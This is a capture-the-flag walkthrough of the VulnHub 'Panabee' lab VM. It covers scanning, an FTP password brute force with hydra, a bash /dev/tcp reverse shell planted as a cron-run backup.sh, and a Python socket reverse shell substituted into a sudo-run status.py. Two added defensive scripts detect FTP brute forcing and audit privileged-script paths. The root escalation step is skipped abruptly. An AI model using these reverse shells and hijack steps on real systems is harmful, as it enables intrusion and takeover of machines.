Panabee

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor
192.168.56.100  08:00:27:cd:98:c4      1      60  PCS Systemtechnik GmbH
192.168.56.228  08:00:27:2b:99:a3      1      60  PCS Systemtechnik GmbH

Kali Linux's netdiscover tool identifies the target host's IP address as 192.168.56.228.

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-22 23:21 EDT
Nmap scan report for bogon (192.168.56.228)
Host is up (0.00011s latency).
Not shown: 65529 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 dc:e1:e6:86:ba:cd:4c:1c:e8:92:c4:02:90:64:d8:ba (RSA)
|   256 00:72:c6:61:0e:34:1b:1a:b4:6c:f8:fc:b3:25:7b:6c (ECDSA)
|_  256 16:24:5b:97:20:ad:7d:ec:c4:fc:19:a5:3d:3c:cc:13 (ED25519)
25/tcp  open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=panabee
| Subject Alternative Name: DNS:panabee
| Not valid before: 2020-06-14T18:25:48
|_Not valid after:  2030-06-12T18:25:48
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: panabee, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:2B:99:A3 (Oracle VirtualBox virtual NIC)
Service Info: Host:  panabee; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 7h59m58s
|_nbstat: NetBIOS name: PANABEE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2023-03-23T11:21:52
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.16 seconds

Getting a shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ smbclient //192.168.56.228/note
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jun 14 23:08:42 2020
  ..                                  D        0  Mon Jun 15 04:59:44 2020
  note.txt                            N      265  Sun Jun 14 23:08:42 2020

                20508240 blocks of size 1024. 12823536 blocks available
smb: \> get note.txt
getting file \note.txt of size 265 as note.txt (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
smb: \> put test.txt
putting file test.txt as \test.txt (2.3 kb/s) (average 2.3 kb/s)
smb: \> ls -alh
NT_STATUS_NO_SUCH_FILE listing \-alh
smb: \> ls
  .                                   D        0  Thu Mar 23 07:23:20 2023
  ..                                  D        0  Mon Jun 15 04:59:44 2020
  test.txt                            A       12  Thu Mar 23 07:23:20 2023
  note.txt                            N      265  Sun Jun 14 23:08:42 2020

                20508240 blocks of size 1024. 12823528 blocks available

The share is writable: files can be uploaded through SMB.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat note.txt
Dear goper, I'll just leave it here as a note,
Sorry for the late response,
The server will now `backup` you files in your home dir,
go ahead and backup anything you like, server will do it for you.
Please delete this note once you've read for security measure

  1. Is goper a username?

  2. Is there a scheduled task running (periodically backing up files)?

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ nikto -h http://192.168.56.228
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.228
+ Target Hostname:    192.168.56.228
+ Target Port:        80
+ Start Time:         2023-03-22 23:25:23 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a81bc478475f, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ 7915 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2023-03-22 23:25:52 (GMT-4) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

      *********************************************************************
      Portions of the server's headers (Apache/2.4.41) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

The directory scan turned up nothing useful, so the next step is to brute-force the password with hydra.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ hydra -l goper -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.228
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-22 23:38:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.228:21/
[21][ftp] host: 192.168.56.228   login: goper   password: spiderman
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-22 23:39:08
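On the server side, the hydra run above shows up in vsftpd's log as a burst of FAIL LOGIN lines for one user from one client, capped by an OK LOGIN. The detector below is an added example written for this page, not a tool from the original walkthrough: it parses lines in vsftpd.log's default format and raises an alert when a client accumulates a threshold of failures inside a time window, and a second, higher-fidelity alert when a success follows such a burst. The log lines are constructed to mirror this attack, and the threshold and window values are choices made here.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in vsftpd.log's default format (not a capture from the box):
# a burst of failed logins for goper from one client followed by a success,
# then an ordinary typo-and-retry from another client five minutes later.
SAMPLE_LOG = """\
Wed Mar 22 23:38:08 2023 [pid 3401] CONNECT: Client "192.168.56.146"
Wed Mar 22 23:38:08 2023 [pid 3400] [goper] FAIL LOGIN: Client "192.168.56.146"
Wed Mar 22 23:38:09 2023 [pid 3402] [goper] FAIL LOGIN: Client "192.168.56.146"
Wed Mar 22 23:38:09 2023 [pid 3403] [goper] FAIL LOGIN: Client "192.168.56.146"
Wed Mar 22 23:38:10 2023 [pid 3404] [goper] FAIL LOGIN: Client "192.168.56.146"
Wed Mar 22 23:38:10 2023 [pid 3405] [goper] FAIL LOGIN: Client "192.168.56.146"
Wed Mar 22 23:38:11 2023 [pid 3406] [goper] FAIL LOGIN: Client "192.168.56.146"
Wed Mar 22 23:38:12 2023 [pid 3407] [goper] OK LOGIN: Client "192.168.56.146"
Wed Mar 22 23:40:01 2023 [pid 3410] [goper] FAIL LOGIN: Client "192.168.56.1"
Wed Mar 22 23:45:01 2023 [pid 3411] [goper] OK LOGIN: Client "192.168.56.1"
"""

# Only login outcomes matter here; CONNECT and transfer lines do not match.
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>[^\]]*)\] )?(?P<event>FAIL LOGIN|OK LOGIN): Client "(?P<client>[^"]+)"'
)


def detect_ftp_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return alerts as (client, kind, user, timestamp) tuples.

    kind == "burst": the client reached `threshold` failed logins within
    `window_seconds` (reported once per burst).
    kind == "success_after_failures": an OK LOGIN arrived while the client was
    still in burst state, i.e. the guessing most likely worked.
    """
    recent = defaultdict(deque)   # client -> timestamps of failures still inside the window
    in_burst = set()              # clients currently flagged
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        client, user, event = m["client"], m["user"], m["event"]
        failures = recent[client]
        # Slide the window: forget failures older than window_seconds.
        while failures and (ts - failures[0]).total_seconds() > window_seconds:
            failures.popleft()
        if event == "FAIL LOGIN":
            failures.append(ts)
            if len(failures) >= threshold and client not in in_burst:
                in_burst.add(client)
                alerts.append((client, "burst", user, ts))
        else:
            if client in in_burst:
                alerts.append((client, "success_after_failures", user, ts))
            # A successful login closes the episode for this client.
            in_burst.discard(client)
            failures.clear()
    return alerts


if __name__ == "__main__":
    for client, kind, user, ts in detect_ftp_bruteforce(SAMPLE_LOG):
        print(f"{ts.isoformat()} {kind:<24} client={client} user={user}")
```

Pointed at /var/log/vsftpd.log the same function produces the same two alerts for a run like the one above; the "success after failures" event is the one worth paging on, because a burst alone is also what a forgotten password looks like. Rate-limiting at the source (fail2ban's stock vsftpd filter keys on the same FAIL LOGIN lines) would have cut the run off after a handful of attempts instead of letting it reach a valid password inside a minute.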
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ftp 192.168.56.228
Connected to 192.168.56.228.
220 (vsFTPd 3.0.3)
Name (192.168.56.228:kali): goper
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||8003|)
150 Here comes the directory listing.
drwxrwxr-x    4 1000     118          4096 Jun 21  2020 .
drwxrwxr-x    4 1000     118          4096 Jun 21  2020 ..
-rw-------    1 1000     1000         4591 Jun 21  2020 .bash_history
-rw-r--r--    1 1000     1000          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 1000     1000         3771 Feb 25  2020 .bashrc
drwx------    2 1000     1000         4096 Jun 14  2020 .cache
drwxrwxr-x    3 1000     1000         4096 Jun 15  2020 .local
-rw-r--r--    1 1000     1000          807 Feb 25  2020 .profile
-rw-rw-r--    1 1000     1000           66 Jun 15  2020 .selected_editor
-rw-r--r--    1 1000     1000            0 Jun 14  2020 .sudo_as_admin_successful
-rw-------    1 1000     1000        11134 Jun 15  2020 .viminfo
-rw-r--r--    1 0        1000          332 Jun 15  2020 status.py
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get status.py
local: status.py remote: status.py
229 Entering Extended Passive Mode (|||59411|)
150 Opening BINARY mode data connection for status.py (332 bytes).
100% |*********************************************************************************|   332        2.25 KiB/s    00:00 ETA
226 Transfer complete.
332 bytes received in 00:00 (2.23 KiB/s)
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||13323|)
150 Ok to send data.
100% |*********************************************************************************|    12      221.10 KiB/s    00:00 ETA
226 Transfer complete.
12 bytes sent in 00:00 (8.87 KiB/s)
ftp> 

This appears to be goper's home directory, so an SSH public key can be uploaded to the target.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): goper
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in goper
Your public key has been saved in goper.pub
The key fingerprint is:
SHA256:3+QFgFMWB+8pvT4RzyAYwi8m6G0MyrXVJolWXxFpj4c kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|     .   =Xo.    |
|     .o += +     |
|   .o +oo++ o    |
|  o+.+o+oE.=oo   |
|.oo+ooo.S o.==.  |
|....+    . =.oo  |
|   .      . +.   |
|           ..    |
|            ..   |
+----[SHA256]-----+

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ls
goper  goper.pub  nmap_full_scan  note.txt  status.py  test.txt
ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||34675|)
150 Ok to send data.
100% |*********************************************************************************|   563       16.77 MiB/s    00:00 ETA
226 Transfer complete.
563 bytes sent in 00:00 (0.98 MiB/s)
ftp> 
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ssh -i goper goper@192.168.56.228
The authenticity of host '192.168.56.228 (192.168.56.228)' can't be established.
ED25519 key fingerprint is SHA256:pA08zKKK15biAZhw/s1p7SqYmXtikdcPqTiWNiYSLwk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.228' (ED25519) to the list of known hosts.
goper@192.168.56.228: Permission denied (publickey).

But the target does not allow key-based login, so this route is a dead end.

Next, write a bash script and upload it via FTP (that is, into goper's home directory) to see whether it gets executed automatically.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat shell.sh
bash -i >& /dev/tcp/192.168.56.146/5555 0>&1

The bash script has to be named backup.sh for cron to execute it.

ftp> put backup.sh
local: backup.sh remote: backup.sh
229 Entering Extended Passive Mode (|||10215|)
150 Ok to send data.
100% |*********************************************************************************|    57      869.75 KiB/s    00:00 ETA
226 Transfer complete.
57 bytes sent in 00:00 (45.43 KiB/s)
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 45726
bash: cannot set terminal process group (3520): Inappropriate ioctl for device
bash: no job control in this shell
goper@panabee:~$ pwd
pwd
/home/goper
goper@panabee:~$ ls -alh
ls -alh
total 72K
drwxrwxr-x 5 goper ftp   4.0K Mar 23 11:57 .
drwxr-xr-x 4 root  root  4.0K Jun 15  2020 ..
-rwx--x--x 1 goper goper   57 Mar 23 11:57 backup.sh
-rw------- 1 goper goper 4.5K Jun 21  2020 .bash_history
-rw-r--r-- 1 goper goper  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 goper goper 3.7K Feb 25  2020 .bashrc
drwx------ 2 goper goper 4.0K Jun 14  2020 .cache
drwxrwxr-x 3 goper goper 4.0K Jun 15  2020 .local
-rw-r--r-- 1 goper goper  807 Feb 25  2020 .profile
-rw-rw-r-- 1 goper goper   66 Jun 15  2020 .selected_editor
-rw------- 1 goper goper   57 Mar 23 11:54 shell.sh
drwx------ 2 goper goper 4.0K Mar 23 11:43 .ssh
-rw-r--r-- 1 root  goper  332 Jun 15  2020 status.py
-rw-r--r-- 1 goper goper    0 Jun 14  2020 .sudo_as_admin_successful
-rw------- 1 goper goper   12 Mar 23 11:40 test.txt
-rw------- 1 goper goper  11K Jun 15  2020 .viminfo
goper@panabee:~$ sudo -l
sudo -l
Matching Defaults entries for goper on panabee:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goper may run the following commands on panabee:
    (jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py

The original status.py can be deleted and replaced, via FTP, with a Python reverse-shell script, which yields a shell as jenny.
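The cron job that runs backup.sh and the sudo rule that runs status.py share one root cause: a privileged process executes a file that lives in a directory the low-privilege user owns. status.py is root-owned and mode 644, which looks safe, but /home/goper is owned by goper with mode 775, so goper can delete the file and plant a replacement under the same name. The audit below is an added example written for this page, not part of the original walkthrough or of any tool on the box: given a path and the uid/gid set of the user who must not control it, it reports whether the file is writable and whether any directory on the path lets that user delete or rename a component (honouring the sticky bit). The demo tree it builds is constructed and stands in for /home/goper (a root-owned file cannot be created without root, so only the directory layout is mirrored), and uid 65534 is an arbitrary stand-in for an unrelated user.

```python
import os
import re
import stat
import tempfile


def user_can_write(st, uid, gids):
    """Whether a user with this uid/gid set controls the inode described by `st`.
    The owner always counts (they can chmod the write bit back on), as does root."""
    if uid == 0 or st.st_uid == uid:
        return True
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def can_replace_child(dir_st, child_st, uid, gids):
    """Whether the user may delete or rename the child entry inside the directory:
    write on the directory, and in a sticky directory (/tmp style) also
    ownership of the directory or of the child itself."""
    if not user_can_write(dir_st, uid, gids):
        return False
    if dir_st.st_mode & stat.S_ISVTX and uid not in (0, dir_st.st_uid, child_st.st_uid):
        return False
    return True


def audit_privileged_script(path, uid, gids):
    """Findings (path, reason) describing how user (uid, gids) could change what a
    privileged invocation of `path` ends up executing: writing the file itself,
    or replacing any component of the path from a directory the user controls."""
    findings = []
    path = os.path.realpath(path)
    st = os.lstat(path)
    if user_can_write(st, uid, gids):
        findings.append((path, f"uid {uid} can modify the file in place"))
    child, child_st = path, st
    while True:
        parent = os.path.dirname(child)
        if parent == child:          # reached the filesystem root
            break
        parent_st = os.lstat(parent)
        if can_replace_child(parent_st, child_st, uid, gids):
            findings.append((parent, f"uid {uid} can delete/rename '{os.path.basename(child)}' here and plant a replacement"))
        child, child_st = parent, parent_st
    return findings


SUDO_RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?:NOPASSWD:\s*)?(?P<cmd>.+)$")


def script_from_sudo_rule(rule):
    """Split a `sudo -l` rule such as '(jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py'
    into (run-as user, script path); the script is taken to be the last argument."""
    m = SUDO_RULE_RE.match(rule.strip())
    if not m:
        raise ValueError(f"unrecognised sudo rule: {rule!r}")
    return m["runas"], m["cmd"].split()[-1]


def build_demo_tree():
    """Constructed stand-in for /home/goper: a 0755 'home' above a 0775 'goper'
    directory owned by the invoking user, holding a 0644 status.py."""
    root = os.path.realpath(tempfile.mkdtemp(prefix="panabee_demo_"))
    home = os.path.join(root, "home", "goper")
    os.makedirs(home)
    os.chmod(os.path.join(root, "home"), 0o755)
    os.chmod(home, 0o775)
    script = os.path.join(home, "status.py")
    with open(script, "w") as fh:
        fh.write("print('status ok')\n")
    os.chmod(script, 0o644)
    return root, script


def demo_scenarios(other_uid=65534):
    """Audit the demo tree in four layouts and report whether the home directory is
    flagged in each. `other_uid` stands in for an unrelated, unprivileged user
    (a conventional 'nobody' value, nudged if it collides with the current user)."""
    if other_uid == os.getuid() or other_uid in os.getgroups():
        other_uid -= 1
    other_gids = {other_uid}
    root, script = build_demo_tree()
    home = os.path.dirname(script)

    def flagged(uid, gids):
        return {p for p, _ in audit_privileged_script(script, uid, gids) if p.startswith(root)}

    results = {"unrelated_user_safe_layout": home in flagged(other_uid, other_gids),
               "owner_of_home": home in flagged(os.getuid(), set(os.getgroups()))}
    os.chmod(home, 0o777)                 # world-writable, like a careless shared directory
    results["world_writable_home"] = home in flagged(other_uid, other_gids)
    os.chmod(home, 0o1777)                # same, but sticky: others cannot rename our file
    results["sticky_world_writable_home"] = home in flagged(other_uid, other_gids)
    return results


if __name__ == "__main__":
    runas, script_path = script_from_sudo_rule("(jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py")
    print(f"sudo rule runs {script_path} as {runas}")
    for name, hit in demo_scenarios().items():
        print(f"{name:<28} {'FINDING' if hit else 'ok'}")
```

The "owner_of_home" scenario is goper's position on this box: the file's own permissions are irrelevant once the user owns the directory around it. The fix is the usual one for both the cron job and the sudo rule: keep privileged scripts under a root-owned, non-writable path such as /usr/local/sbin and point the rule or crontab there. The same ownership check explains the later foothold, since the root-owned .tmux-0 directory listed under /home/jenny grants group write to jenny.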

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ vim status.py

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat status.py
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
goper@panabee:~$ rm -rf status.py
rm -rf status.py
ftp> put status.py
local: status.py remote: status.py
229 Entering Extended Passive Mode (|||26655|)
150 Ok to send data.
100% |*********************************************************************************|   232        3.35 MiB/s    00:00 ETA
226 Transfer complete.
232 bytes sent in 00:00 (167.32 KiB/s)
ftp> 
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ cat status.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.146",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
sudo -u jenny /usr/bin/python3 /home/goper/status.py
/usr/bin/python3: can't open file '/home/goper/status.py': [Errno 13] Permission denied
goper@panabee:~$ chmod 777 status.py
chmod 777 status.py
goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
sudo -u jenny /usr/bin/python3 /home/goper/status.py
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ sudo nc -nlvp 8888
listening on [any] 8888 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.228] 59108
$ id
uid=1001(jenny) gid=1001(jenny) groups=1001(jenny)
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
jenny@panabee:/home/goper$ cd /home
cd /home
jenny@panabee:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root  root  4.0K Jun 15  2020 .
drwxr-xr-x 20 root  root  4.0K Jun 15  2020 ..
drwxrwxr-x  5 goper ftp   4.0K Mar 23 12:08 goper
drwx------  3 jenny jenny 4.0K Jun 15  2020 jenny
jenny@panabee:/home$ cd jenny
cd jenny
jenny@panabee:~$ ls -alh
ls -alh
total 40K
drwx------ 3 jenny jenny 4.0K Jun 15  2020 .
drwxr-xr-x 4 root  root  4.0K Jun 15  2020 ..
-rw------- 1 jenny jenny 2.0K Jun 30  2020 .bash_history
-rw-r--r-- 1 jenny jenny  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 jenny jenny 3.7K Feb 25  2020 .bashrc
-rw------- 1 jenny jenny   32 Jun 15  2020 .lesshst
-rw-r--r-- 1 jenny jenny  807 Feb 25  2020 .profile
-rw-rw-r-- 1 jenny jenny   13 Jun 15  2020 status.txt
-rw-r--r-- 1 root  root   213 Jun 15  2020 thanks_jenny
drwxrwxr-x 2 root  jenny 4.0K Jun 30  2020 .tmux-0

From .bash_history we learn there is a secret.zip file; download it to the local Kali Linux machine.

But cracking it fails; privilege escalation on this box has to go through .tmux.

Privilege escalation

cd /root
# ls -alh
ls -alh
total 80K
drwx------  5 root root 4.0K Jun 30  2020 .
drwxr-xr-x 20 root root 4.0K Jun 15  2020 ..
-rw-------  1 root root  18K Jun 30  2020 .bash_history
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
drwx------  2 root root 4.0K Jun 14  2020 .cache
-rw-------  1 root root   38 Jun 30  2020 .lesshst
drwxr-xr-x  3 root root 4.0K Jun 14  2020 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root  239 Jun 15  2020 proof.txt
-rw-r--r--  1 root root   66 Jun 15  2020 .selected_editor
drwx------  2 root root 4.0K Jun 14  2020 .ssh
-rw-------  1 root root  13K Jun 21  2020 .viminfo

 __                  __   ___  ___
|__)  /\  |\ |  /\  |__) |__  |__
|    /~~\ | \| /~~\ |__) |___ |___

STRIVE FOR PROGRESS, NOT FOR PERFECTION